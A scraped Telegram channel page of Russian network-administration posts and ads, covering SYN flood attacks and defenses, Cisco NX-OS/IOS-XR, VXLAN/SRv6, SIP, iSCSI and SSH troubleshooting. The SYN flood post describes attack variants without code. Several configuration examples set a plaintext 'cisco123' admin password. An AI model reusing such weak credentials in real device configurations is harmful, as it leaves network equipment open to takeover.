networkadm | Unsorted

Telegram-канал networkadm - Network Admin

12610

Обучающий канал по сетевому и системному администрированию. Сотрудничество: @dad_admin Биржа: https://telega.in/c/networkadm РКН: https://bit.ly/4ioc61C

Subscribe to a channel

Network Admin

Аренда IT-Оборудования от АТОМДАТА под любые задачи и масштаб

От базовых решений - до создания критической информационной инфраструктуры:
- Быстрое предоставление оборудования с собственного склада или подбор и закупка под проект;
- Оперативный подбор конфигурации под задачу, бюджет или по другими параметрам;
- Техническая поддержка 24/7. 3 линии поддержки
- Помощь с настройкой ПО и запуском оборудования;
- SLA 99,98 с финансовой компенсацией;
- Размещение оборудования в собственных ЦОДах "Росатома", а также партнерских ЦОДах в РФ или на площадке заказчика;

Бесплатное тестирование оборудования под задачу!

Подробности и бесплатная консультация

#реклама
О рекламодателе

Читать полностью…

Network Admin

⚙️ Инструменты для админов и DevOps

Linux Command Library
— справочник по командам Linux. Быстрый доступ без лишнего поиска.

SAD Servers
— интерактивный тренажер для отладки Linux-систем.

Kubectl-neat
— плагин для Kubernetes, который убирает лишние данные из вывода команд.

Разбор FreeGRID
— как без лицензий NVIDIA запускают GPU в облаке.


Ещё больше полезного в канале CORTEL

➡️ Подписаться

Реклама ООО "Кортэл"
ИНН: 7816246925

Читать полностью…

Network Admin

❓ Хотите приручить SSH и стать экспертом удаленного администрирования?

На открытом уроке «Работа с SSH в Linux» вы освоите все ключевые техники, необходимые для работы с протоколом SSH.

Что вы узнаете:
— Как настроить SSH-сервер и клиент.
— Как использовать аутентификацию по ключам для максимальной безопасности.
— Как синхронизировать файлы с помощью rsync и повысить эффективность администрирования.

⭐ Спикер Николай Лавлинский — технический директор в Метод Лаб, PhD Economic Science, опытный руководитель разработки и преподаватель.

⏰ Встречаемся 20 февраля в 19:00 мск. Урок проводится в преддверии старта курса «Administrator Linux. Basic», а участники получат скидку на обучение.

👉 Настройте свои навыки на новый уровень — регистрируйтесь прямо сейчас: https://otus.pw/ON3E/?erid=2W5zFGkXL7z 

Реклама. ООО "ОТУС ОНЛАЙН-ОБРАЗОВАНИЕ". ИНН 9705100963.

Читать полностью…

Network Admin

Да что они вообще знают о настоящем счастье 👀

N.A. ℹ️ BashTex

Читать полностью…

Network Admin

TCP SYN Flood: классическая DDoS-атака на уровень соединений

Одним из самых распространенных методов DDoS-атак является TCP SYN Flood — атака, использующая особенности установления соединения в протоколе TCP.

Она нацелена на исчерпание ресурсов сервера или сетевого оборудования, вынуждая его обрабатывать огромное количество “поддельных” запросов на соединение.

Как работает TCP SYN Flood?

Атака эксплуатирует механизм трехстороннего рукопожатия (three-way handshake) в TCP:
1️⃣Клиент отправляет серверу SYN (запрос на установление соединения).
2️⃣ Сервер отвечает SYN-ACK, подтверждая готовность соединения.
3️⃣ Клиент должен отправить ACK, завершая установку соединения.

При TCP SYN Flood атакующий отправляет серверу огромное количество SYN-запросов, но не завершает установку соединений (не отправляет ACK).

В результате сервер тратит ресурсы на ожидание завершения соединений, что может привести к истощению доступных слотов в таблице соединений и отказу в обслуживании для легитимных пользователей.

Типы TCP SYN Flood атак
Классический SYN Flood – атакующий использует поддельные IP-адреса, чтобы сервер не мог отличить легитимные соединения от вредоносных.
SYN-ACK Flood – серверу отправляют множество SYN-ACK пакетов без предшествующих запросов, заставляя его генерировать RST-пакеты в ответ.
Reflected SYN Flood – используется спуфинг IP-адресов для перенаправления атакующего трафика через сторонние узлы, увеличивая нагрузку на жертву.

Методы защиты
TCP SYN Cookies – сервер при перегрузке использует криптографический идентификатор вместо хранения состояния соединения, предотвращая заполнение таблицы соединений.
Rate Limiting – ограничение количества SYN-запросов от одного IP в секунду.
Deep Packet Inspection (DPI) – анализ трафика для выявления аномального поведения.
BGP Flowspec – динамическая фильтрация вредоносного трафика на уровне провайдера.
DDoS Protection Services – облачные сервисы, такие как Cloudflare, Radware, Akamai, помогают смягчать атаки.

N.A. ℹ️ BashTex

Читать полностью…

Network Admin

Fibre Channel vs Ethernet: как меняется ландшафт корпоративных сетей хранения

Еще 15–20 лет назад Fibre Channel (FC) был безальтернативным выбором для корпоративных систем хранения данных.

Он обеспечивал высокую надежность, отказоустойчивость и предсказуемую производительность, что делало его стандартом для крупных предприятий. 


Однако сегодня технологии на базе Ethernet догнали FC по функциональности, а в некоторых аспектах даже превзошли его.

Почему FC долгое время доминировал?

Fibre Channel разрабатывался специально для высокопроизводительных систем хранения.

Его архитектура включает несколько уровней, начиная с физического кодирования сигналов и заканчивая поддержкой протоколов верхнего уровня (SCSI, NVMe).

Ключевые преимущества FC:
Гарантированная стабильность — оборудование сертифицируется, исключая проблемы совместимости.
Минимальная задержка — отсутствие накладных расходов на TCP/IP снижает вероятность перегрузок.
Отказоустойчивость — встроенные механизмы балансировки нагрузки и резервирования.

Однако монополизация рынка (практически все FC-решения сегодня принадлежат Broadcom) привела к высокой стоимости оборудования, сложности технической поддержки и низкому темпу развития технологий.

Как Ethernet догнал и перегнал FC

Несмотря на то, что FC долго считался эталоном сетей хранения, Ethernet быстро развивался. Сегодня он предлагает:
Скорости 100–400 Гбит/с вместо традиционных 32–64 Гбит/с у FC.
Гибкость — можно использовать стандартные сетевые карты, а не дорогие HBA.
Экономию за счет высокой конкуренции среди производителей.

Ранее Ethernet уступал FC по надежности, но с развитием технологий QoS, PFC (Priority Flow Control), RDMA и NVMe over TCP это преимущество стало не таким очевидным.

Ключевые различия между Ethernet и FC

1️⃣Стоимость и доступность. Ethernet дешевле, так как на рынке представлено множество производителей оборудования. FC же контролируется ограниченным числом вендоров, что делает его более дорогим в приобретении и обслуживании.

2️⃣ Пропускная способность. Если раньше FC обеспечивал лидирующие показатели скорости, то теперь Ethernet предлагает стандартные решения на 100 Гбит/с, а на горизонте уже 400 Гбит/с. FC же в большинстве случаев ограничивается 32 Гбит/с.

3️⃣ Гибкость и масштабируемость. Ethernet легко интегрируется в существующую инфраструктуру и поддерживает широкий спектр решений. FC требует строго сертифицированных компонентов, что ограничивает возможности модернизации.

4️⃣ Поддержка современных протоколов. Протоколы хранения, такие как NVMe over TCP, демонстрируют задержки, сопоставимые с FC, но при этом используют стандартную сетевую инфраструктуру.

Будущее корпоративных сетей хранения

Пока Fibre Channel остается востребованным в узких нишах, общее развитие инфраструктуры движется в сторону Ethernet. 


Универсальность Ethernet, его более высокая скорость и поддержка современных технологий хранения делают его основным претендентом на доминирование в корпоративных системах хранения данных.

Какие технологии используются в вашей инфраструктуре? Остается ли FC актуальным, или вы уже перешли на Ethernet? Делитесь мнениями в комментариях.

N.A. ℹ️ BashTex

Читать полностью…

Network Admin

Настройка Cisco NX-OS и IOS-XR

В этом посте продолжим разбирать основные команды конфигурации для Cisco NX-OS и Cisco IOS-XR. Настроим VLAN, OSPF.

Настройка VLAN на Cisco NX-OS

В NX-OS VLAN создаются и привязываются к интерфейсам вручную. Рассмотрим пример:
1. Создадим VLAN 10 и VLAN 20
2. Настроим порты как access
3. Настроим trunk-порт

NEXUS-SWITCH# configure terminal
NEXUS-SWITCH(config)# vlan 10
NEXUS-SWITCH(config-vlan)# name USERS
NEXUS-SWITCH(config-vlan)# vlan 20
NEXUS-SWITCH(config-vlan)# name SERVERS
NEXUS-SWITCH(config-vlan)# exit

NEXUS-SWITCH(config)# interface ethernet1/1
NEXUS-SWITCH(config-if)# switchport mode access
NEXUS-SWITCH(config-if)# switchport access vlan 10
NEXUS-SWITCH(config-if)# exit

NEXUS-SWITCH(config)# interface ethernet1/2
NEXUS-SWITCH(config-if)# switchport mode access
NEXUS-SWITCH(config-if)# switchport access vlan 20
NEXUS-SWITCH(config-if)# exit

NEXUS-SWITCH(config)# interface ethernet1/3
NEXUS-SWITCH(config-if)# switchport mode trunk
NEXUS-SWITCH(config-if)# switchport trunk allowed vlan 10,20
NEXUS-SWITCH(config-if)# exit


Теперь интерфейсы eth1/1 и eth1/2 работают в VLAN 10 и 20, а eth1/3 является trunk-портом.

Проверить конфигурацию можно командой:

NEXUS-SWITCH# show vlan brief


Настройка OSPF на Cisco NX-OS

Для маршрутизации между VLAN или несколькими коммутаторами настроим OSPF.

NEXUS-SWITCH# configure terminal
NEXUS-SWITCH(config)# feature ospf
NEXUS-SWITCH(config)# router ospf 1
NEXUS-SWITCH(config-router)# router-id 1.1.1.1
NEXUS-SWITCH(config-router)# network 192.168.1.0/24 area 0
NEXUS-SWITCH(config-router)# network 192.168.2.0/24 area 0
NEXUS-SWITCH(config-router)# exit


Проверить настройки можно командой:

NEXUS-SWITCH# show ip ospf neighbor


N.A. ℹ️ BashTex

Читать полностью…

Network Admin

Cisco IOS-XR: Операционная система для провайдеров

Cisco IOS-XR — это операционная система, разработанная для маршрутизаторов уровня операторов связи.

Она предназначена для обработки большого объема трафика и обеспечивает высокую отказоустойчивость.

Архитектура и ключевые особенности

IOS-XR использует микроядро QNX Neutrino, что позволяет выполнять процессы независимо друг от друга. Среди других особенностей:
Многопоточность и симметричная многопроцессорность (SMP) — эффективное использование ресурсов оборудования.
Поддержка протоколов MPLS, Segment Routing и DWDM — важные технологии для магистральных сетей.
Динамическое обновление без перезагрузки (ISSU) — обновления можно применять без простоя сети.

Базовая конфигурация

Пример настройки хоста и интерфейса Loopback:

RP/0/RP/CPU0:router# configure terminal
RP/0/RP/CPU0:router(config)# hostname IOS-XR-ROUTER
RP/0/RP/CPU0:router(config)# interface loopback0
RP/0/RP/CPU0:router(config-if)# ip address 10.2.2.2/32
RP/0/RP/CPU0:router(config-if)# commit
RP/0/RP/CPU0: IOS-XR-ROUTER(config-if)# end
RP/0/RP/CPU0: IOS-XR-ROUTER# show ip interface brief


Обратите внимание, что в IOS-XR требуется команда commit для сохранения конфигурации.

Когда использовать IOS-XR?

Эта ОС идеально подходит для магистральных сетей провайдеров, где важны отказоустойчивость, производительность и поддержка сложных сетевых технологий.

Выбор между NX-OS и IOS-XR зависит от задач: если вам нужен мощный коммутатор для ЦОД — выбирайте NX-OS, если маршрутизатор для магистрали — IOS-XR.


N.A. ℹ️ BashTex

Читать полностью…

Network Admin

Все надоело и пропал интерес, чувствуешь себя амебой и хочется только залипать в телефоне. Бывает?

Психолог взрослого человека - канал для айтишников, у которых периодически опускаются руки и отключается мозг, ибо переработки и постоянная тревожность не приводят к другим исходам.

✔️ Как научиться отвлекаться от работы и отдыхать?
✔️ Как совместить кучу рабочих задач и время с семьей?
✔️ Как справиться с прокрастинацией?
✔️ Как не растерять запал, даже если кажется, что ничего не выходит?

Подписывайтесь на канал @vadimpetrov_psy и научитесь работать без упахивания, выгорания и ущерба для личной жизни!

👨🏻‍💻 Псс. Заходите в закреп канала - там много полезного, и даже бесплатный мини-курс.

Читать полностью…

Network Admin

👩‍💻 Открытый урок «Инструменты и методы мониторинга серверов на платформе Windows Server»

🗓 10 февраля в 20:00 МСК
🆓 Бесплатно. Урок в рамках старта курса «Администратор Windows» от Otus.

На вебинаре вы узнаете:
✔️ Основные подходы к мониторингу серверов и выявлению проблем в инфраструктуре.
✔️ Как использовать встроенные инструменты Windows Server: Performance Monitor, Event Viewer и другие.
✔️ Обзор сторонних решений для мониторинга серверов и сети.
✔️ Практические рекомендации по настройке автоматического уведомления и отчетности.

🔗 Ссылка на регистрацию: https://otus.pw/5NMFh/

#реклама
О рекламодателе

Читать полностью…

Network Admin

Вышло большое обновление российской программы для мониторинга серверов и сетевого оборудования "10-Страйк Мониторинг Сети Pro" версия 8.0.

Теперь можно редактировать карту сети, используя Web-интерфейс. Это значит, что можно чаще обходиться без графической консоли, в том числе при работе под Linux. Добавлена новая реакция на события в виде запуска скрипта SSH. Также улучшена работа с движком Netflow: стало можно рисовать больше графиков и диаграмм по статистике трафика.

Основные функции программы:
- Опрашивает хосты в фоновом режиме
- Выполняет множество проверок по большинству сетевых протоколов
- Реагирует на события
- Отображает данные и статистику
- Поддерживает распределенный мониторинг и Web-интерфейс

Продукт включён в реестр Минцифры. Получен сертификат совместимости с РЕД ОС.

📌Узнать больше и посмотреть видео о программе:
https://vk.cc/cI9eX3

На сайте вы также найдете другие программы: для учета ПК и железа, для администрирования.

Реклама. ИП Степанов Д.Ю. ИНН 732806262853

Читать полностью…

Network Admin

Наткнулись на промо новой облачной конференции. Пошли подробнее узнавать, кто её организует — оказалось, это создатель первого в России публичного облака собственной разработки.

У ребят планируется много технических докладов: от обзоров новых типов сетевых дисков до приоритетов бизнеса в области ИТ — звучит интересно.

Подробнее можете посмотреть тут

Читать полностью…

Network Admin

Если хочется не сидеть на месте, а активнее изучать то, как строятся стабильные, и что важно, безопасные сети, этот курс — лучший старт. Он охватывает вообще всё, что нужно для понимания всех основ коммутирования и маршрутизации.

В курсе тебя ждут 100 тестов для закрепления теории, 20 лабораторных работ для практики и даже один проект, который позволит применить полученные знания прямо в реальных условиях. И да, все это основано на Cisco CCNA.

А если вдруг возникнут вопросы — не переживай! Круглосуточная поддержка всегда рядом.

Ссылка на курс тут: https://stepik.org/a/227855

Группа с поддержкой, если возникнут трудности: /channel/Networks_anyone

Читать полностью…

Network Admin

ECMP (Equal-Cost Multi-Path): как интернет выбирает лучший путь

В обычной маршрутизации пакеты данных идут по одному заранее выбранному маршруту.

Но что, если у маршрутизатора есть несколько равнозначных путей до пункта назначения? 


В таком случае используется ECMP (Equal-Cost Multi-Path Routing) — механизм, который позволяет передавать трафик по нескольким маршрутам одновременно.

Как это работает?

Маршрутизатор проверяет таблицу маршрутизации и видит, что до нужного узла есть несколько одинаково “дорогих” путей (например, с одинаковой метрикой в OSPF или одинаковым количеством хопов в BGP). Вместо выбора одного пути он:

Распределяет пакеты между всеми доступными маршрутами.
Использует хеширование заголовков пакетов, чтобы трафик одного соединения шёл по одному пути и не ломал TCP.
Позволяет увеличивать пропускную способность сети без добавления новых, более мощных устройств.

Где применяется ECMP?
• В магистральных сетях (повышает отказоустойчивость и балансирует нагрузку).
• В облачных и дата-центрах (ускоряет доступ к ресурсам).
• В SD-WAN и VPN (позволяет динамически использовать несколько каналов связи).

ECMP делает интернет более гибким и быстрым, а его работа остаётся незаметной для пользователей.

Читать полностью…

Network Admin

Selectel School — твой путь в IT 😎

Приглашаем тебя на Selectel School — бесплатный обучающий онлайн‑интенсив для тех, кто хочет работать в дата‑центре.

В курсе ты узнаешь об устройстве наших ЦОДов, освоишь сборку и обслуживание серверов, а также изучишь принципы настройки сетевого оборудования. Все это поможет тебе прокачать навыки инженера дата‑центра и стать сотрудником Selectel!

Активируй бота и проходи курс Selectel School: https://slc.tl/kwzhh

Реклама, АО «Селектел», ИНН: 7810962785, ERID: 2VtzqwCM58G

Читать полностью…

Network Admin

Протокол AppleTalk — устаревшая система, оставившая след в истории

AppleTalk был собственным набором протоколов для связи устройств Apple в локальных сетях.

Разработанный в 1980-х годах, AppleTalk был стандартом для сетевых технологий в экосистеме Apple, но со временем был заменён более универсальными протоколами, такими как TCP/IP.

Тем не менее, его вклад в развитие сетевых технологий нельзя недооценивать.


AppleTalk был проприетарным протоколом, предназначенным для создания локальных сетей, прежде всего между компьютерами Mac, принтерами и другими периферийными устройствами Apple.

В отличие от TCP/IP, AppleTalk был простым и удобным решением для небольших офисных и домашних сетей, но в конечном итоге потерял свою актуальность в условиях глобализации и перехода на более универсальные технологии.

Как работал AppleTalk?

AppleTalk обеспечивал все необходимые функции для работы локальных сетей:
Маршрутизация: AppleTalk использовал протокол Routing Table Maintenance Protocol (RTMP) для маршрутизации данных между устройствами.
Адресация: Устройства в сети имели уникальные адреса AppleTalk, состоящие из двух частей: сетевого номера и номера узла. Это позволяло системе быстро находить устройства и направлять трафик.
Динамическое управление именами: Протокол AppleTalk Name Binding Protocol (NBP) использовался для обнаружения устройств в сети без необходимости вручную прописывать адреса.

С переходом Apple к стандартам TCP/IP в конце 1990-х годов и начале 2000-х, AppleTalk постепенно стал уходить в прошлое. 


Современные устройства Apple поддерживают только TCP/IP, что делает AppleTalk устаревшим. В 2000 году Apple официально прекратил поддержку AppleTalk в своих операционных системах.

N.A. ℹ️ BashTex

Читать полностью…

Network Admin

VXLAN vs SRv6 на практике – настройка и тестирование

Теперь, когда мы разобрали теорию, давайте посмотрим, как VXLAN и SRv6 работают на практике.

Настройка VXLAN на Cisco

В качестве примера возьмем классическую схему с двумя узлами, где VXLAN создаст виртуальную L2-сеть поверх L3-инфраструктуры.

Шаг 1: Настраиваем VTEP (VXLAN Tunnel End Point)

interface Loopback0
ip address 10.1.1.1 255.255.255.255


Шаг 2: Создаем VXLAN-интерфейс

interface nve1
source-interface Loopback0
no shutdown


Шаг 3: Настраиваем привязку VNI к VLAN

interface Vlan10
vxlan vni 10010


Шаг 4: Добавляем маршрутизацию через BGP EVPN (если используется SDN)

router bgp 65000
address-family l2vpn evpn


Теперь трафик будет инкапсулироваться в VXLAN и передаваться по L3-сети.

Настройка SRv6 на Cisco IOS-XR

SRv6 требует поддержки IPv6 и сегментной маршрутизации.

Шаг 1: Включаем SRv6

router isis CORE
address-family ipv6 segment-routing srv6


Шаг 2: Задаем SID (Segment Identifier) для узла

interface Loopback0
ipv6 address 2001:db8::1/128


Шаг 3: Включаем SRv6 на интерфейсе

interface GigabitEthernet0/0/0
ipv6 segment-routing srv6


Шаг 4: Добавляем маршрут через SRv6

router isis CORE
segment-routing srv6 locator LOC1


Теперь маршруты будут передаваться с учетом сегментов, оптимизируя трафик.

Выводы

VXLAN идеально подходит для внутридатацентровых сетей, создавая виртуальные L2-сегменты поверх IP. Он удобен для облачных провайдеров и SDN-решений.

SRv6 — мощное решение для магистральных сетей, заменяющее MPLS и упрощающее маршрутизацию. Он востребован в 5G, CDN и ISP-инфраструктуре.

N.A. ℹ️ BashTex

Читать полностью…

Network Admin

Сравнение протоколов VXLAN и SRv6: выбор для современной сети

В современных сетях ключевыми задачами являются масштабируемость, гибкость и автоматизация, особенно в дата-центрах и магистральных сетях.

Два передовых протокола, которые решают эти задачи — VXLAN (Virtual Extensible LAN) и SRv6 (Segment Routing over IPv6). Давайте разберем их принципы работы и сравним, где они наиболее эффективны.


Что такое VXLAN?

VXLAN (Virtual Extensible LAN) — это технология виртуализации сети уровня 2 поверх сети уровня 3. Она решает проблему масштабируемости традиционных VLAN (ограничение 4096 VLAN-ов) и позволяет создавать логические сети, которые могут простираться через несколько дата-центров.

Как работает?
VXLAN использует UDP-инкапсуляцию, добавляя 24-битный VXLAN ID (VNI), что позволяет создавать до 16 миллионов виртуальных сетей.

Пакеты пересылаются между узлами через туннели, а маршрутизация обеспечивается за счет VXLAN Tunnel Endpoints (VTEP).


Где используется?
• Виртуализация дата-центров (SDN-решения).
• Объединение удаленных площадок в один логический сегмент сети.
• Организация многопользовательских сред (Multi-Tenant).

Что такое SRv6?

SRv6 (Segment Routing over IPv6) — это протокол маршрутизации следующего поколения, который использует концепцию “маршрутизации по сегментам” (Segment Routing).

В отличие от традиционной MPLS-маршрутизации, SRv6 использует специальные заголовки IPv6 (SRH, Segment Routing Header) вместо меток MPLS.


Как работает?
Маршрутизатор при передаче пакета добавляет в заголовок список сегментов (Segment List) — это цепочка IP-адресов, через которые должен пройти пакет.

При этом каждый маршрутизатор просто обрабатывает следующий сегмент списка, что снижает нагрузку на таблицы маршрутизации.

Где используется?
• Автоматизированное управление трафиком в больших сетях (Traffic Engineering).
• Магистральные сети провайдеров (ISP Backbone).
• Оптимизация маршрутизации в 5G и облачных сетях.

N.A. ℹ️ BashTex

Читать полностью…

Network Admin

Что такое SIP (Session Initiation Protocol)?

SIP (Session Initiation Protocol) — это протокол, используемый для установления, изменения и завершения сеансов связи, таких как голосовые и видеозвонки через интернет (VoIP).

Он имеет более сложную структуру, чем стандартные протоколы, такие как HTTP или FTP, и играет ключевую роль в современных системах связи.


Как работает SIP?

SIP работает по принципу “запрос-ответ”. Он использует структуру сообщений, которые передаются между клиентом и сервером, чтобы установить, настроить и завершить сеанс связи.

SIP-сообщения могут быть как запросами (например, на установку связи), так и ответами на запросы (например, подтверждение установления связи).

Процесс начинается с того, что один из участников (например, SIP-клиент) отправляет запрос на создание сеанса связи, используя команду INVITE.

Ответ на этот запрос может быть как положительным (например, с подтверждением звонка), так и отрицательным (если участник занят или отсутствует).

Кроме этого, SIP поддерживает функции, такие как пересылка сообщений, проверка доступности участников, а также маршрутизация сообщений между серверами и устройствами. 


Важно отметить, что SIP является независимым от транспортного протокола — он может работать поверх TCP, UDP или SCTP.

Структура SIP-сообщений

SIP-сообщения имеют строгую структуру, которая включает:
1. Заголовок: Информация о сообщении, включая тип сообщения, его источник и адрес назначения.
2. Тело: Содержит параметры сеанса, такие как кодеки, IP-адреса и порты для передачи данных.

Пример SIP-запроса:

INVITE sip:bob@biloxi.com SIP/2.0
Via: SIP/2.0/UDP atlanta.com;branch=z9hG4bK74bf9
Max-Forwards: 70
To: Bob <sip:bob@biloxi.com>
From: Alice <sip:alice@atlanta.com>;tag=1928301774
Call-ID: a84b4c76e66710@atlanta.com
CSeq: 314159 INVITE
Contact: <sip:alice@atlanta.com>
Content-Type: application/sdp
Content-Length: 142


N.A. ℹ️ BashTex

Читать полностью…

Network Admin

Настройка Cisco Embedded Packet Capture (EPC)

Cisco Embedded Packet Capture (EPC) позволяет захватывать сетевой трафик непосредственно на маршрутизаторе, что упрощает диагностику и анализ сетевых проблем.

Рассмотрим процесс настройки EPC на примере схемы, где необходимо перехватить входящие и исходящие пакеты на интерфейсе FastEthernet 0/0 между ПК 192.168.1.5 и веб-сервером 212.193.249.136.

1️⃣Создание буфера для хранения пакетов

Сначала создадим буфер, в котором будут сохраняться захваченные пакеты. По умолчанию его размер — 1 МБ.

Router#monitor capture buffer merionet_cap size 1024 linear


Флаг linear означает, что при достижении предельного размера запись прекратится (по умолчанию буфер работает в циклическом режиме).

2️⃣ Настройка фильтрации трафика через ACL

Чтобы захватывать только нужный трафик, создадим расширенный список доступа web-traffic. Он включает пакеты от обоих хостов, обеспечивая двунаправленный захват.

Router(config)#ip access-list extended web-traffic
Router(config-ext-nacl)#permit ip host 192.168.1.5 host 212.193.249.136
Router(config-ext-nacl)#permit ip host 212.193.249.136 host 192.168.1.5


Свяжем этот список доступа с буфером захвата:

Router#monitor capture buffer merionet_cap filter access-list web-traffic


3️⃣ Определение точки захвата

Теперь зададим интерфейс FastEthernet 0/0 в качестве точки захвата и укажем, что будем собирать как входящий, так и исходящий трафик.

Router#monitor capture point ip cef MNpoint FastEthernet0/0 both


Если CEF (Cisco Express Forwarding) не включен, появится предупреждение. Включим его вручную:

Router(config)#ip cef


После этого свяжем точку захвата с буфером:

Router#monitor capture point associate MNpoint merionet_cap


4️⃣ Запуск и остановка захвата

Запускаем сбор пакетов:

Router#monitor capture point start MNpoint


Чтобы остановить захват, используем:

Router#monitor capture point stop MNpoint


5️⃣Просмотр и анализ захваченного трафика

Проверить состояние буфера можно с помощью:

Router#show monitor capture buffer


Вывести содержимое буфера:

Router#show monitor capture buffer merionet_cap dump


Проверить параметры точки захвата:

Router#show monitor capture point


6️⃣Экспорт данных для анализа

Чтобы проанализировать захваченные пакеты в Wireshark, экспортируем их на TFTP-сервер:

Router#monitor capture buffer merionet_cap export tftp://192.168.1.10/capture.pcap


После этого файл capture.pcap появится на сервере 192.168.1.10 и его можно будет открыть в Wireshark.

N.A. ℹ️ BashTex

Читать полностью…

Network Admin

Настройка SSH-доступа к NX-OS

Чтобы можно было подключаться к коммутатору через SSH, нужно включить SSH-сервер и создать пользователя.

NEXUS-SWITCH# configure terminal
NEXUS-SWITCH(config)# feature ssh
NEXUS-SWITCH(config)# username admin password cisco123 role network-admin
NEXUS-SWITCH(config)# exit


Теперь можно подключаться к NX-OS через SSH.

Практика настройки Cisco IOS-XR

Настройка OSPF на IOS-XR: Включаем OSPF и задаем маршруты:

RP/0/RP/CPU0:IOS-XR-ROUTER# configure terminal
RP/0/RP/CPU0:IOS-XR-ROUTER(config)# router ospf 1
RP/0/RP/CPU0:IOS-XR-ROUTER(config-ospf)# router-id 2.2.2.2
RP/0/RP/CPU0:IOS-XR-ROUTER(config-ospf)# area 0
RP/0/RP/CPU0:IOS-XR-ROUTER(config-ospf)# network 10.1.1.0 0.0.0.255 area 0
RP/0/RP/CPU0:IOS-XR-ROUTER(config-ospf)# commit
RP/0/RP/CPU0:IOS-XR-ROUTER(config-ospf)# exit


Проверяем работу:

RP/0/RP/CPU0:IOS-XR-ROUTER# show ospf neighbor


Настройка SSH-доступа к IOS-XR: Включаем SSH и создаем пользователя:

RP/0/RP/CPU0:IOS-XR-ROUTER# configure terminal
RP/0/RP/CPU0:IOS-XR-ROUTER(config)# username admin
RP/0/RP/CPU0:IOS-XR-ROUTER(config-un)# secret cisco123
RP/0/RP/CPU0:IOS-XR-ROUTER(config-un)# commit
RP/0/RP/CPU0:IOS-XR-ROUTER(config-un)# exit


Теперь можно подключаться через SSH.

N.A. ℹ️ BashTex

Читать полностью…

Network Admin

Крутая программа для тех, кто уже работает с Linux и хочет погрузиться DevOps.

В двух словах: программа на 2 месяца, ты учишься, тебе еще и платят. Начинка: начинающий и продвинутый курс по Linux, погружение в DevOps. Обучение с практикой, лабораторными и под контролем экспертов из K2 Сloud.

Подробнее можно узнать на сайте

Читать полностью…

Network Admin

Cisco NX-OS: операционная система для дата-центров

Cisco NX-OS — это операционная система, разработанная для коммутаторов Cisco Nexus, которые широко используются в центрах обработки данных (ЦОД).

Она предлагает надежность, масштабируемость и удобные функции управления сетью, отличаясь от традиционной Cisco IOS.


Архитектура и ключевые особенности

NX-OS построена на базе ядра Linux и поддерживает 64-разрядную архитектуру, многопроцессорность и изолированные пространства памяти.

Это повышает отказоустойчивость, поскольку сбой одного процесса не влияет на работу других.

Также NX-OS поддерживает:
Модульную загрузку сервисов — можно активировать только нужные функции, снижая нагрузку на процессор и память.
Python и Bash — администраторы могут использовать скрипты для автоматизации.
FabricPath и VXLAN — современные технологии для отказоустойчивых и масштабируемых сетей.

Конфигурация базовых параметров

Пример настройки имени хоста и интерфейса Loopback:

switch# configure terminal
switch(config)# hostname NEXUS-SWITCH
NEXUS-SWITCH(config)# interface loopback0
NEXUS-SWITCH(config-if)# ip address 10.1.1.1/32
NEXUS-SWITCH(config-if)# end
NEXUS-SWITCH# show ip interface brief


В отличие от Cisco IOS, здесь можно использовать маску /32 вместо традиционной записи 255.255.255.255.

N.A. ℹ️ BashTex

Читать полностью…

Network Admin

Настройка SAN на основе iSCSI

Для демонстрации настроим SAN-сеть с использованием iSCSI — популярного и доступного варианта, использующего обычную Ethernet-сеть для передачи блоков данных.

1. Установка iSCSI-таргета (хранилища) на сервере

На сервере с ОС Linux установим программное обеспечение для работы iSCSI-таргета:

sudo apt install tgt


Создадим новый iSCSI-таргет:

sudo nano /etc/tgt/conf.d/iscsi.conf


Добавим конфигурацию для хранения:

<target iqn.2024-02.example:storage>
backing-store /dev/sdb
initiator-address 192.168.1.100
</target>


Сохраняем и применяем настройки:

sudo systemctl restart tgt
sudo tgtadm --mode target --op show


2. Подключение iSCSI-инициатора на клиенте

На клиентском сервере установим iSCSI-инициатор:

sudo apt install open-iscsi


Запустим обнаружение iSCSI-таргетов в сети:

sudo iscsiadm -m discovery -t sendtargets -p 192.168.1.10


Подключаемся к хранилищу:

sudo iscsiadm -m node -T iqn.2024-02.example:storage -p 192.168.1.10 --login


После успешного подключения устройство появится в системе как /dev/sdX, и его можно использовать как обычный диск.

N.A. ℹ️ BashTex

Читать полностью…

Network Admin

Что такое SAN и зачем он нужен?

Storage Area Network (SAN) — это высокоскоростная специализированная сеть, предназначенная для объединения серверов и устройств хранения данных. 


В отличие от традиционных NAS (Network Attached Storage), которые используют обычные сетевые соединения, SAN работает на более низком уровне и использует специализированные протоколы для быстрой и надежной передачи данных.

Чем SAN отличается от других систем хранения?

SAN позволяет серверам обращаться к хранилищу как к локальному диску, но с высокой масштабируемостью и отказоустойчивостью.

Основное отличие SAN от NAS в том, что SAN использует блочный доступ, а NAS — файловый.


NAS передает файлы через стандартные сетевые протоколы (NFS, SMB/CIFS), а SAN работает на уровне блоков через Fibre Channel (FC), iSCSI или NVMe-oF.
• В SAN данные передаются по выделенной сети, а в NAS они идут через обычную локальную сеть.
SAN быстрее и надежнее, но сложнее в настройке и дороже в реализации.

Основные компоненты SAN

SAN-сеть включает несколько ключевых элементов:
Серверы (инициаторы) — устройства, которые обращаются к хранилищу.
Сетевые коммутаторы — управляют трафиком между серверами и системами хранения.
Системы хранения данных (таргеты) — массивы дисков или SSD, к которым серверы получают доступ.
Протоколы — для взаимодействия могут использоваться Fibre Channel (FC), iSCSI, FCoE и NVMe-oF.

N.A. ℹ️ BashTex

Читать полностью…

Network Admin

Основные причины ошибки «SSH Connection Refused»

Продолжим разбор

5️⃣ Брандмауэр препятствует подключению

Брандмауэр может блокировать входящие соединения по порту SSH, что приводит к ошибке «Connection Refused». Чтобы проверить, разрешает ли брандмауэр подключение по SSH, используйте команду:

sudo ufw allow ssh


Эта команда позволит подключаться через SSH, если брандмауэр использует UFW (Uncomplicated Firewall).

6️⃣ Порт SSH закрыт

Если порт 22 закрыт на сервере, соединение будет отклонено. Чтобы проверить, прослушивает ли сервер порт 22, используйте команду:

sudo lsof -i:22


Если порт не прослушивается, откройте его с помощью iptables:

sudo iptables -A INPUT -p tcp --dport 22 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT


Этот набор команд позволит принимать подключения на порт 22.

7️⃣ Отладка SSH-соединения

Если вы продолжаете получать ошибку «Connection Refused», включите отладочный режим SSH. Это поможет выявить, что именно мешает подключению. Используйте команду:

ssh -v [server_ip]


Для более подробной отладки используйте:

ssh -vv [server_ip]


или

ssh -vvv [server_ip]


Эти команды покажут более подробную информацию, которая поможет выявить причину ошибки.

N.A. ℹ️ BashTex

Читать полностью…

Network Admin

IL vs. QUIC: два интересных, но не самых известных протокола

